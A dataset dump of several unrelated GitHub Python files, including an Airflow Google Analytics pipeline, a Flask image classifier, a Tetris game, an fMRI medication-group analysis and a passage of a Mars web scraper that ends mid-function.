default_args\n\nGOOGLE_ANALYTICS_CONN_ID = 'ga_main'\n\n# Google Analytics has a \"lookback window\" that defaults to 30 days.\n# During this period, metrics are in flux as users return to the property\n# and complete various actions and conversion goals.\n# https://support.google.com/analytics/answer/1665189?hl=en\n\n# The period set as the LOOKBACK_WINDOW will be dropped and replaced during\n# each run of this workflow.\n\nLOOKBACK_WINDOW = 30\n\n# NOTE: While GA supports relative input dates, it is not advisable to use\n# these in case older workflows need to be re-run.\n\n# https://developers.google.com/analytics/devguides/reporting/core/v4/basics\nSINCE = \"{{{{ macros.ds_add(ds, -{0}) }}}}\".format(str(LOOKBACK_WINDOW))\nUNTIL = \"{{ ds }}\"\n\nview_ids = [106710411,\n 178683781,\n 226956185,\n 214892222,\n 224195176,\n 171699580]\n\n# https://developers.google.com/analytics/devguides/reporting/core/v3/reference#sampling\nSAMPLING_LEVEL = None\n\n# https://developers.google.com/analytics/devguides/reporting/core/v3/reference#includeEmptyRows\nINCLUDE_EMPTY_ROWS = False\n\nPAGE_SIZE = 1000\n\n# NOTE: Not all metrics and dimensions are available together. 
It is\n# advisable to test with the GA explorer before deploying.\n# https://developers.google.com/analytics/devguides/reporting/core/dimsmets\n\nMETRICS = [{'expression': 'ga:pageViews'},\n {'expression': 'ga:bounces'},\n {'expression': 'ga:users'},\n {'expression': 'ga:newUsers'},\n {'expression': 'ga:adClicks'},\n {'expression': 'ga:CPM'},\n {'expression': 'ga:CPC'},\n {'expression': 'ga:CTR'},\n {'expression': 'ga:avgSessionDuration'}]\n\n\nDIMENSIONS = [{'name': 'ga:date'},\n {'name': 'ga:hour'},\n {'name': 'ga:keyword'},\n {'name': 'ga:referralPath'},\n {'name': 'ga:campaign'},\n {'name': 'ga:sourceMedium'},\n {'name': 'ga:deviceCategory'}]\n\n# The specified TIMEFORMAT is based on the ga:dateHourMinute dimension.\n# If using ga:date or ga:dateHour, this format will need to adjust accordingly.\nCOPY_PARAMS = [\"COMPUPDATE OFF\",\n \"STATUPDATE OFF\",\n \"JSON 'auto'\",\n \"TIMEFORMAT 'YYYYMMDDHHMI'\"\n \"TRUNCATECOLUMNS\",\n \"region as 'us-east-1'\"]\n\n# Primary and Incremental Keys are set to same value as no other reliable\n# primary_key can found. This will result in all records with matching values of\n# dateHourMinute to be deleted and new records inserted for the period of time\n# covered by the lookback window. Timestamps matching records greater than\n# the lookback window from the current data will not be pulled again and\n# therefore not replaced.\n\nPRIMARY_KEY = 'datehourminute'\nINCREMENTAL_KEY = 'datehourminute'\n\ndefault_args['retries'] = 2,\ndefault_args['retry_delay'] = timedelta(minutes=5)\n\ndag_params = {\n 'dag_id': f'{GOOGLE_ANALYTICS_CONN_ID}_to_postgres_hourly',\n 'default_args': default_args,\n 'start_date': datetime(2020, 10, 1, 8, 0, 0),\n 'catchup': False,\n 'schedule_interval': '@hourly'\n}\n\nwith DAG(**dag_params) as dag:\n start = DummyOperator(task_id='start')\n end = DummyOperator(task_id='end')\n\n for view_id in view_ids:\n\n view_id = str(view_id)\n extract_ga = GoogleAnalyticsReportingToSqlOperator(task_id=f'etl_{view_id}',\n google_analytics_conn_id=GOOGLE_ANALYTICS_CONN_ID,\n view_id=view_id,\n since=SINCE,\n until=UNTIL,\n sampling_level=SAMPLING_LEVEL,\n dimensions=DIMENSIONS,\n metrics=METRICS,\n page_size=PAGE_SIZE,\n include_empty_rows=INCLUDE_EMPTY_ROWS,\n db_conn_id='postgres_prod',\n db_table='w0_external.google_analytics'\n )\n\n start >> extract_ga\n extract_ga >> end","repo_name":"lyeith/pygadgets-core","sub_path":"pygadgets/airflow_util/dags/ga_to_postgres.py","file_name":"ga_to_postgres.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72963626433","text":"\"\"\"\n绘图工具类\n\"\"\"\nfrom typing import List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass Plot3:\n INIT: bool = False\n ax = None\n\n @staticmethod\n def __init():\n plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\n plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n\n fig = plt.figure()\n Plot3.ax = fig.gca(projection='3d')\n Plot3.ax.grid(False)\n\n Plot3.INIT = True\n\n @staticmethod\n def plot3d(lines: List[Tuple[np.ndarray, str]]) -> None:\n if not Plot3.INIT:\n Plot3.__init()\n\n for lc in lines:\n x = lc[0][:, 0]\n y = lc[0][:, 1]\n z = lc[0][:, 2]\n Plot3.ax.plot(x, y, z, lc[1])\n\n @staticmethod\n def show():\n if not Plot3.INIT:\n raise RuntimeError(\"Plot3::请在show前调用plot3d\")\n\n plt.show()\n\n\nclass Plot2:\n INIT = False\n\n @staticmethod\n def __init():\n plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\n 
plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n\n Plot2.INIT = True\n\n @staticmethod\n def plot2d(lines: List[Tuple[np.ndarray, str]]) -> None:\n if not Plot2.INIT:\n Plot2.__init()\n\n for lc in lines:\n x = lc[0][:, 0]\n y = lc[0][:, 1]\n plt.plot(x, y, lc[1])\n\n @staticmethod\n def plot2d_xy(x: np.ndarray, y: np.ndarray, describe='r') -> None:\n if not Plot2.INIT:\n Plot2.__init()\n\n plt.plot(x, y, describe)\n\n @staticmethod\n def show():\n if not Plot2.INIT:\n raise RuntimeError(\"Plot3::请在show前调用plot3d\")\n\n plt.show()\n","repo_name":"madokast/cctpy","sub_path":"codes/cctpy/plotuils.py","file_name":"plotuils.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22638920606","text":"\r\nclass Adjacency(): #Lists all rooms and which rooms they're adjacent to.\r\n def __init__(self):\r\n self.__attic = (\"atticStair\", \"hallway\")\r\n self.__atticStair = (\"attic\", \"floor2Hall\", \"hallway\")\r\n ####\r\n self.__upstairs = (\"bathroom\", \"storage\", \"bedroom\",\r\n \"attic\", \"closet\", \"lobby\")\r\n self.__bathroom = \"hallway\"\r\n self.__masterBedroom = \"hallway\"\r\n self.__storage = \"hallway\"\r\n self.__bedroom = \"hallway\"\r\n self.__floor2Stair = (\"upstairs\", \"hallway\", \"lobby\")\r\n ####\r\n self.__lobby = (\"upstairs\", \"diningroom\", \"den\", \"dining room\")\r\n self.__den = (\"garage\", \"kitchen\", \"lobby\")\r\n self.__garage = (\"den\")\r\n self.__diningroom = (\"kitchen\", \"lobby\", \"basement\")\r\n self.__kitchen = (\"diningroom\", \"den\", \"dining room\")\r\n ###\r\n self.__dictionary = {\"attic\":self.__attic,\r\n \"atticStair\":self.__atticStair, \"upstairs\":self.__upstairs,\r\n \"hallway\":self.__upstairs,\r\n \"bathroom\":self.__bathroom,\r\n \"storage\":self.__storage, \"closet\":self.__storage,\r\n \"bedroom\":self.__bedroom,\r\n \"floor2Stair\":self.__floor2Stair, \"lobby\":self.__lobby,\r\n \"den\":self.__den, \"garage\":self.__garage,\r\n \"diningroom\":self.__diningroom, \"dining room\":self.__diningroom,\r\n \"kitchen\":self.__kitchen}\r\n\r\n def getDict(self):\r\n return(self.__dictionary)\r\n","repo_name":"danielslee97/Chronophobia","sub_path":"Adjacency.py","file_name":"Adjacency.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3536980305","text":"import os\n\nimport numpy as np\nfrom flask import Flask, render_template, request, send_from_directory\nfrom keras.layers import Conv2D, Dense, Flatten, Dropout\nfrom keras.models import Sequential\nfrom keras.optimizers import SGD\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow import keras\n\napp = Flask(__name__)\n\nif __name__ == '__main__':\n app.run()\n\n\n@app.route('/icons/')\ndef getUrl(filename):\n return send_from_directory(\n os.path.join(\n \"E:/projects/comvistugas2/templates/icons\"\n ), filename\n )\n\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/upload-image', methods=[\"GET\", \"POST\"])\ndef upload():\n ROOT_PATH = \"E:/projects/comvistugas2/tmp/dataset\"\n CLASS_MODE = 'categorical'\n COLOR_MODE = 'grayscale'\n\n BATCH_SIZE = 10\n TARGET_SIZE = (32, 32)\n\n dataset_generator = ImageDataGenerator(\n rescale=1. 
/ 255,\n rotation_range=0.2,\n validation_split=0.2,\n zoom_range=0.2\n )\n\n train_set = dataset_generator.flow_from_directory(\n ROOT_PATH,\n target_size=TARGET_SIZE,\n batch_size=BATCH_SIZE,\n color_mode=COLOR_MODE,\n class_mode=CLASS_MODE,\n subset='training'\n )\n\n upload = request.files[\"image\"]\n\n pathImage = \"E:/projects/comvistugas2/uploads\"\n imageUploadName = \"original_image.jpg\"\n\n fileNameSplit = upload.filename.split('.')\n image.filename = imageUploadName\n\n upload.save(os.path.join(pathImage, imageUploadName))\n\n img = image.load_img(pathImage + \"/\" + imageUploadName, target_size=TARGET_SIZE, color_mode=\"grayscale\")\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n\n model = keras.models.load_model(\"comvismodel.h5\")\n\n images = np.vstack([x])\n classes = model.predict(images)\n predicted_index = np.argmax(classes)\n\n print(classes)\n print(predicted_index)\n\n result = \"\"\n\n baseUrl = \"\"\n if classes[0][predicted_index] > .5:\n if predicted_index == train_set.class_indices[\"masker\"]:\n print('Masker')\n result = \"Masker\"\n elif predicted_index == train_set.class_indices[\"nomasker\"]:\n result = \"Tidak Pakai Masker\"\n print('Tidak Pakai Masker')\n else:\n result = \"Masih gak yakin\"\n print(\"Index out of range\")\n else:\n print(\"Tidak yakin dengan gambar apa yang dikirim\")\n result = \"Masih gak yakin\"\n\n return render_template(\"index.html\", result=result)\n\n\n@app.route('/training-data')\ndef traindata():\n ROOT_PATH = \"E:/projects/comvistugas2/tmp/dataset\"\n CLASS_MODE = 'categorical'\n COLOR_MODE = 'grayscale'\n\n BATCH_SIZE = 15\n TARGET_SIZE = (48, 48)\n\n EPOCH = 30\n\n dataset_generator = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.3,\n rotation_range=0.3,\n validation_split=0.2,\n zoom_range=0.2\n )\n\n validation_generator = ImageDataGenerator(\n rescale=1. 
/ 255,\n validation_split=0.2\n )\n\n train_set = dataset_generator.flow_from_directory(\n ROOT_PATH,\n target_size=TARGET_SIZE,\n batch_size=BATCH_SIZE,\n color_mode=COLOR_MODE,\n class_mode=CLASS_MODE,\n subset='training'\n )\n\n validation_set = validation_generator.flow_from_directory(\n ROOT_PATH,\n target_size=TARGET_SIZE,\n batch_size=BATCH_SIZE,\n color_mode=COLOR_MODE,\n class_mode=CLASS_MODE,\n subset='validation',\n shuffle=False\n )\n\n train_set.class_indices\n\n model = Sequential([\n Conv2D(64, (3, 3), input_shape=(TARGET_SIZE[0], TARGET_SIZE[1], 1), activation='relu'),\n Dropout(0.2),\n Flatten(),\n Dense(32, activation='relu'),\n Dropout(0.2),\n Dense(16, activation='relu'),\n Dense(2, activation='softmax')\n ])\n\n optimizer = SGD(learning_rate=0.1)\n model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\n model.summary()\n\n model.fit(\n train_set,\n epochs=EPOCH,\n validation_data=validation_set\n )\n\n model.save(\"modelcomvisbaru.h5\")\n\n\n","repo_name":"Lukmannudin/TubesComputerVision","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15541059639","text":"from random import shuffle\nfrom pylernkarten.commands import command\n\n_questions = [\n\"\"\"- Was kostet denn ___ Schrank\n- ___ kostet 799 euro.\n\"\"\"\n]\n\ndef parse_question(text):\n text = text.split('___')\n elements = []\n for i in range(0, len(text)):\n elements.append(('text', text[i]))\n elements.append(('filler',[]))\n\n elements.pop()\n\n result = []\n for element in elements:\n elem_type, value = element\n if elem_type != 'text' or '\\n' not in value:\n result.append(element)\n continue\n\n lines = value.split('\\n')\n \n for line in lines:\n result.append(('text', line))\n result.append(('newline',))\n \n result.pop()\n\n return [ element for element in result if element[0] != 'text' or (element[0] == 'text' and element[1] != \"\")]\n \n\n@command\ndef question(number):\n return parse_question(_questions[int(number)])\n","repo_name":"danilomo/PyLernkarten","sub_path":"pylernkarten/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20409451295","text":"# coding: utf-8\nimport pandas as pd\n\n# 读取气象数据\ntmp = pd.read_csv(\n u'47891_高松.csv',\n parse_dates={'date_hour': [\"日期\"]},\n index_col=\"date_hour\",\n na_values=\"×\"\n)\n\ndel tmp[\"时间\"] # [时间]的列不使用,所以删除\n\n# 列的名字中不要带有日语,所以仅把接下来要使用的列的名字修改成英语\ncolumns = {\n \"降水量(mm)\": \"rain\",\n \"气温(℃)\": \"temperature\",\n \"日照时间(h)\": \"sunhour\",\n \"湿度(%)\": \"humid\",\n}\ntmp.rename(columns=columns, inplace=True)\n\n# -- 可视化 --\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(10, 6))\n\n# 生成图表\n\nplt.hist(tmp['temperature'], bins=50, color=\"gray\")\nplt.xlabel('Temperature(C degree)')\nplt.ylabel('count')\n\n# 保存图表\nplt.savefig('7-4-1-4-graph.png')\n","repo_name":"whlll-coder/Python-ML","sub_path":"PythonCode/07/7-4-1-4-graph.py","file_name":"7-4-1-4-graph.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26916709248","text":"import csv\n\ninfile = open('customers.csv','r')\n\ncsvfile = csv.reader(infile,delimiter=',')\n\noutfile = open('customer_country.csv','w')\nnext(csvfile)\nwriter = csv.writer(outfile)\nheader = ['Full 
Name', 'Country']\nwriter.writerow(header)\ncount = 0\n\nfor record in csvfile:\n First_Name = record[1]\n Last_Name = record[2]\n Country = record[4]\n data = [\n [First_Name + ' ' + Last_Name , Country]\n ]\n writer.writerows(data)\n count = count + 1\n\nprint(count)\noutfile.close()","repo_name":"lukehankins3/readandwritefiles","sub_path":"customer_country.py","file_name":"customer_country.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30581664711","text":"import pygame\n\nfrom games.tetris.Tetris import Tetris, STATE_RUNNING, STATE_GAME_OVER\n\nTILE_SIZE = 20\n\nCOLOR_WHITE = (255, 255, 255)\nCOLOR_RED = (255, 0, 0)\nCOLOR_GREEN = (0, 128, 0)\nCOLOR_BLUE = (0, 0, 255)\nCOLOR_YELLOW = (255, 255, 0)\nCOLOR_FUCHSIA = (255, 0, 255)\nCOLOR_LIME = (0, 255, 0)\nCOLOR_NAVY = (0, 0, 128)\n\nFIGURE_COLORS = [COLOR_RED, COLOR_GREEN, COLOR_BLUE, COLOR_YELLOW, COLOR_FUCHSIA, COLOR_LIME, COLOR_NAVY]\n\n\ndef color_tile(screen, x, y, color):\n pygame.draw.rect(\n screen,\n color,\n [x * TILE_SIZE, y * TILE_SIZE, TILE_SIZE, TILE_SIZE]\n )\n\n\ndef draw_current_figure(screen, game: Tetris):\n figure = game.current_figure\n\n for y_offset in range(figure.height):\n for x_offset in range(figure.width):\n if figure.is_occupied(x_offset, y_offset):\n color_tile(screen, figure.x + x_offset, figure.y + y_offset, FIGURE_COLORS[figure.color - 1])\n\n\nif __name__ == \"__main__\":\n game = Tetris(15, 20)\n\n screen_width = game.width * TILE_SIZE\n screen_height = game.height * TILE_SIZE\n\n pygame.init()\n screen = pygame.display.set_mode((screen_width, screen_height))\n pygame.display.set_caption(\"TETRIS\")\n\n fps = 5\n clock = pygame.time.Clock()\n\n running = True\n\n while running:\n screen.fill(COLOR_WHITE)\n\n # draw current board state\n for y in range(game.height):\n for x in range(game.width):\n if game.is_occupied(x, y):\n color_tile(screen, x, y, FIGURE_COLORS[game.get_state(x, y) - 1])\n\n if game.current_state == STATE_RUNNING:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n elif event.key == pygame.K_r:\n game.rotate_current_figure()\n elif event.key == pygame.K_a:\n game.move_left()\n elif event.key == pygame.K_d:\n game.move_right()\n elif event.key == pygame.K_s:\n game.move_down()\n\n draw_current_figure(screen, game)\n game.move_down()\n\n elif game.current_state == STATE_GAME_OVER:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n game.reset()\n\n font = pygame.font.SysFont(None, 50, bold=True)\n text = font.render('GAME OVER', True, COLOR_RED)\n text_rect = text.get_rect(center=(screen_width / 2, screen_height / 2))\n screen.blit(text, text_rect)\n\n pygame.display.flip()\n clock.tick(fps)\n\n","repo_name":"theowieland/MachineLearning","sub_path":"games/tetris/TetrisDrawer.py","file_name":"TetrisDrawer.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72710095555","text":"# %%\n'''\nSplits patients into medicated and non-medicated\nReruns the behavioural and glm analyses\n\n\n'''\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport pingouin as pg\nfrom functions.data_helpers import get_phenotype, get_task_beh_data\nfrom functions.data_helpers import get_computer\n\nsubj_list = 
list(np.loadtxt('subject_list_exclusions.txt', dtype='str'))\ndf = get_phenotype(subj_list)\ndf['medgroup'] = df['group'] + '-' + df['Medicated']\n\n# % Behavioural analysis\ntask_df = get_task_beh_data(subj_list, ratings_only=True)\ntask_df['medgroup'] = np.nan\n\n# populate the task data df with the new groups\nfor subj in task_df.participant_id.unique():\n new_group_value = df.loc[df.participant_id == subj, 'medgroup'].values[0]\n task_df.loc[task_df.participant_id == subj, 'medgroup'] = new_group_value\n \n# quick and dirty plots\ntmp = task_df[task_df.rating_measure == 'valence']\nsns.catplot(data=tmp, kind='bar', x='trial_type', y='rating', hue='medgroup',\n col='phase')\nplt.show()\n\ntmp = task_df[task_df.rating_measure == 'arousal']\nsns.catplot(data=tmp, kind='bar', x='trial_type', y='rating', hue='medgroup',\n col='phase')\nplt.show()\n\n# statistical analysis\n# comparing medicated and unmedicated patients\ngroup_idx = df.medgroup\nres_df = pd.DataFrame()\nfor label in ['arousal', 'valence']:\n xdf = task_df[task_df.rating_measure == label]\n\n # safety rev\n srev = ((xdf.loc[(xdf.phase == 'reversal')\n & (xdf.trial_type == 'CS-')].rating.values)\n - (xdf.loc[(xdf.phase == 'conditioning')\n & (xdf.trial_type == 'CS+')].rating.values))\n # threat rev\n trev = ((xdf.loc[(xdf.phase == 'reversal')\n & (xdf.trial_type == 'CS+')].rating.values)\n - (xdf.loc[(xdf.phase == 'conditioning')\n & (xdf.trial_type == 'CS-')].rating.values))\n\n # do a between t-test srev\n res = pg.ttest(srev[group_idx == 'patient-Medicated'],\n srev[group_idx == 'patient-Unmedicated'])\n res['measure'] = label\n res['contrast'] = 'Safety reversal'\n res['test'] = 'Two sample'\n res_df = pd.concat([res_df, res])\n\n # do a between t-test ttrev\n res = pg.ttest(trev[group_idx == 'patient-Medicated'],\n trev[group_idx == 'patient-Unmedicated'])\n res['measure'] = label\n res['contrast'] = 'Threat reversal'\n res['test'] = 'Two sample'\n res_df = pd.concat([res_df, res])\nprint(res_df.head())\n\n# % activation analysis...\n\n# paths\n_, proj_dir = get_computer()\nbids_dir = proj_dir+'data/bids/'\nderiv_dir = proj_dir+'data/derivatives/post-fmriprep-fix/'\nroi_dir = proj_dir+'data/derivatives/masks/'\nfig_dir = '../../figures/'\nbg_img = (proj_dir + 'data/derivatives/masks/'\n + 'tpl-MNI152NLin2009cAsym_res-01_desc-brain_T1w.nii.gz')\n\n# beta extraction method\nmethod = 'region'\neroded = False\n\n# sphere radius size\nradius = 4\n\n# glm analysis stream to use\nglm_label = 'smooth-6mm_despike'\n\n# roi information for plotting and statistics\nroi_dict = {'Insula (L)': {'contrast': 'Threat',\n 'label': ['leftInsula'],\n 'files': [roi_dir+'Savage_threat_leftInsula.nii.gz']\n },\n 'Insula (R)': {'contrast': 'Threat',\n 'label': ['rightInsula'],\n 'files': [roi_dir+'Savage_threat_rightInsula.nii.gz']\n },\n 'dACC': {'contrast': 'Threat',\n 'label': ['acc'],\n 'files': [roi_dir+'Savage_threat_acc.nii.gz']\n },\n 'vmPFC': {'contrast': 'Safety',\n 'label': ['vmpfc'],\n 'files': [roi_dir+'Savage_safety_vmpfc.nii.gz']\n },\n 'PCC': {'contrast': 'Safety',\n 'label': ['pcc'],\n 'files': [roi_dir+'Savage_safety_pcc.nii.gz']\n },\n 'Putamen (L)': {'contrast': 'Threat',\n 'label': ['leftPUT'],\n 'files': [roi_dir+'tian_threat_leftPUT.nii.gz']\n },\n 'Putamen (R)': {'contrast': 'Threat',\n 'label': ['rightPUT'],\n 'files': [roi_dir+'tian_threat_rightPUT.nii.gz']\n },\n 'Caudate (L)': {'contrast': 'Threat',\n 'label': ['leftCAU'],\n 'files': [roi_dir+'tian_threat_leftCAU.nii.gz']\n },\n 'Caudate (R)': {'contrast': 'Threat',\n 
'label': ['rightCAU'],\n 'files': [roi_dir+'tian_threat_rightCAU.nii.gz']\n },\n 'GP (L)': {'contrast': 'Threat',\n 'label': ['leftGP'],\n 'files': [roi_dir+'tian_threat_leftGP.nii.gz']\n },\n 'GP (R)': {'contrast': 'Threat',\n 'label': ['rightGP'],\n 'files': [roi_dir+'tian_threat_rightGP.nii.gz']\n }\n }\n\nresults_df = pd.DataFrame()\nfor subj in subj_list:\n if eroded:\n xdf = pd.read_csv(deriv_dir+'spm_group/glm_'+glm_label\n + '/extracted_betas/'+subj+'_Savage_'+str(radius)+'mm_eroded.csv')\n else:\n xdf = pd.read_csv(deriv_dir+'spm_group/glm_'+glm_label\n + '/extracted_betas/'+subj+'_Savage_'+str(radius)+'mm.csv')\n results_df = pd.concat([results_df, xdf])\n\n if eroded:\n xdf = pd.read_csv(deriv_dir+'spm_group/glm_'+glm_label\n + '/extracted_betas/'+subj+'_tian_'+str(radius)+'mm_eroded.csv')\n else:\n xdf = pd.read_csv(deriv_dir+'spm_group/glm_'+glm_label\n + '/extracted_betas/'+subj+'_tian_'+str(radius)+'mm.csv')\n results_df = pd.concat([results_df, xdf])\n\n# Do statistics\nstat_df = pd.DataFrame()\n\n# regions to include in statistical analysis\nroi_list = ['Insula (L)',\n 'Insula (R)',\n 'dACC',\n 'vmPFC',\n 'PCC',\n 'Putamen (L)',\n 'Putamen (R)',\n 'Caudate (L)',\n 'Caudate (R)',\n 'GP (L)',\n 'GP (R)'\n ]\n\n# add the new groups to the activation dataframe\nfor subj in results_df.subj.unique():\n new_group_value = df.loc[df.participant_id == subj, 'medgroup'].values[0]\n results_df.loc[results_df.subj == subj, 'medgroup'] = new_group_value\n\nfor roi_label in roi_list:\n\n # get info from dict\n roi = roi_dict[roi_label]['label'][0]\n\n # get contrast data\n if roi_dict[roi_label]['contrast'] == 'Threat':\n contrast = 'Threat reversal'\n\n elif roi_dict[roi_label]['contrast'] == 'Safety':\n contrast = 'Safety reversal'\n\n # two sample t-test\n a = results_df.loc[(results_df.method == method)\n & (results_df.roi == roi)\n & (results_df.contrast == contrast)\n & (results_df.medgroup == 'patient-Medicated')].value.values\n\n b = results_df.loc[(results_df.method == method)\n & (results_df.roi == roi)\n & (results_df.contrast == contrast)\n & (results_df.medgroup == 'patient-Unmedicated')].value.values\n\n res = pg.ttest(a, b)\n res['roi'] = roi_label\n res['contrast'] = contrast\n res['test'] = '2samp'\n stat_df = pd.concat([stat_df, res])\n\n# perform multiple comparison correction\nstat_df['p-val-corrected'] = 1\nfor test in ['1samp', '2samp']:\n reject, pvals_corr = pg.multicomp(\n stat_df.loc[stat_df.test == test]['p-val'].values, method='fdr_by')\n stat_df.loc[stat_df.test == test, 'p-val-corrected'] = pvals_corr\n\n# print results\nfor i, row in stat_df.iterrows():\n print(row.roi, ':', row.contrast, ':', row.test,\n ': t=', np.round(row['T'], 2),\n ': p=', np.round(row['p-val-corrected'], 4))\n\n# stat_df.to_csv('../../results/ROI_mean_stats.csv')\n\n# Clean stat df\nclean_df = pd.concat([stat_df[stat_df.test == '1samp'],\n stat_df[stat_df.test == '2samp']])\nclean_df = clean_df[['test', 'roi', 'contrast', 'T', 'dof', 'cohen-d', 'p-val-corrected', 'BF10']]\nclean_df['T'] = clean_df['T'].round(2)\nclean_df.dof = clean_df.dof.round(2)\nclean_df['cohen-d'] = clean_df['cohen-d'].round(2)\nclean_df['p-val-corrected'] = clean_df['p-val-corrected'].round(4)\nclean_df['BF10'] = clean_df['BF10'].astype(\"float\")\nclean_df['BF10'] = clean_df['BF10'].round(2)\n# clean_df.to_csv('../../results/ROI_mean_stats_clean.csv')\n\n# %%\nclean_df.head(20)\n# 
%%\n","repo_name":"clinical-brain-networks/OCDBaseline_public","sub_path":"code/medication_control_analyses.py","file_name":"medication_control_analyses.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35784893991","text":"#Code from https://github.com/Ghernandez1991/Flask-Mongodb\n#Thank you for your time Joe\n# Sempre ubi sub ubi!\n\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport pymongo\nfrom splinter import Browser\nimport time\n\n# starts up Chrome browser, headless and no extention as Mac Chrome does not need it\ndef start_browser():\n \n return Browser(\"chrome\", headless=False)\n\n#Let the scraping of websites begin!\ndef scrape ():\n browser = start_browser()\n mars_data = {}\n\n # visit the NASA Mars News site and scrape headlines\n nasa_url = 'https://mars.nasa.gov/news/'\n browser.visit(nasa_url)\n # takes URL and goes to browser to load webpage\n\n nasa_html = browser.html\n nasa_soup = BeautifulSoup(nasa_html, 'html.parser')\n # calls BeautifulSoup to parse of text of the browsed webpage\n\n list_of_news = nasa_soup.find('ul', class_='item_list')\n #finds unordered list in a class of item_list in html puts all this into list_of_news\n first_item_of_list = list_of_news.find('li', class_='slide')\n #finds listed item in a class of slide in list_of_news puts all this into first_item_of_list\n header = first_item_of_list.find('div', class_='content_title').text\n #finds div in a class of content_title puts the text into header\n synoposis = first_item_of_list.find('div', class_='article_teaser_body').text\n #finds div in a class of article_teaser_body puts the text into synoposis\n\n \n results1 = nasa_soup.find_all('li', class_=\"slide\")\n#finds all listed items in a class of slide puts the into results1\n\n mars_data[\"nasa_headline\"] = header\n #puts text of header into mars_data dictionary as nasa_headline\n mars_data[\"nasa_teaser\"] = synoposis\n #puts text of synoposis into mars_data dictionary as nasa_data\n\n\n #Visit the url for JPL Featured Space Image here.\n\n image_url = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\n browser.visit(image_url)\n #takes URL and goes to browser to load webpage\n browser.click_link_by_partial_text('FULL IMAGE')\n# clicks hypertextlink to pull FUll Image of webpage first image\n\n\n expand = browser.find_by_css('a.fancybox-expand')\n expand.click()\n time.sleep(1)\n #stops the loading of an iframe\n\n image_url_html = browser.html\n image_soup = BeautifulSoup(image_url_html, 'html.parser')\n # calls BeautifulSoup to parse of text of the browsed webpage\n# grabbing down teh html text to find the latest photo of Mars\n img_relative_path = image_soup.find('img', class_='fancybox-image')['src']\n featured_image_url = f'https://www.jpl.nasa.gov{img_relative_path}'\n mars_data[\"feature_image_src\"] = featured_image_url\n\n #Visit the Mars Weather twitter account here and scrape the latest Mars weather tweet from the page.\n#Save the tweet text for the weather report as a variable called mars_weather.\n twitter_url = \"https://twitter.com/marswxreport?lang=en\"\n browser.visit(twitter_url)\n twitter_html = browser.html\n twitter_soup = BeautifulSoup(twitter_html, 'html.parser')\n # calls BeautifulSoup to parse of text of the browsed webpage\n tweets = twitter_soup.find('div', class_='stream')\n#Scrape twitter page for latest weather data\n for tweet in tweets:\n try:\n text_of_tweets = 
tweets.find('p', class_= \"tweet-text\").text\n #The time and date of article publication\n if(text_of_tweets):\n print('-----------------')\n print(text_of_tweets)\n \n \n \n #Tweet Title and text of tweet put into a dictionary\n # Dictionary to be inserted into MongoDB\n post = {\n 'Tweet Title': text_of_tweets\n }\n# Insert dictionary into MongoDB as a document\n collection1.insert_one(post)\n \n except AttributeError as e:\n print(e)\n tweet_link=e\n break \n mars_data[\"weather_summary\"] = tweet_link\n#this places the tweet into the Mongo db\n\n\n #Visit the Mars Facts webpage here and use Pandas to scrape the table containing facts about the planet including Diameter,\n\n mars_url = \"https://space-facts.com/mars/\"\n\n browser.visit(mars_url)\n \n mars1_html = browser.html\n mars1_soup = BeautifulSoup(mars1_html, 'html.parser')\n# calls BeautifulSoup to parse of text of the browsed webpage\n\n mars_table = mars1_soup.find('section', class_='sidebar widget-area clearfix')\n first_table = mars_table.find('table', class_='tablepress tablepress-id-p-mars')\n\n\n \n url5 = \"https://space-facts.com/mars/\"\n\n\n tables = pd.read_html(url5)\n \n #table 1 is the needed table \n tables[1]\n\n df = tables[1]\n df.columns = ['Identifier', 'Measurments']\n df\n mars_table_html = df.to_html(header=False, index=False)\n mars_data[\"fact_table\"] = mars_table_html\n#taking mars facts table into panda dataframe without headers and index into mars_table_html that is placed into Mongo DB mars_data blob\n\n #grabbing hemisphere1\n # looking for and grabbing a photo title and URL\n \n hemi_url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\n\n browser.visit(hemi_url)\n 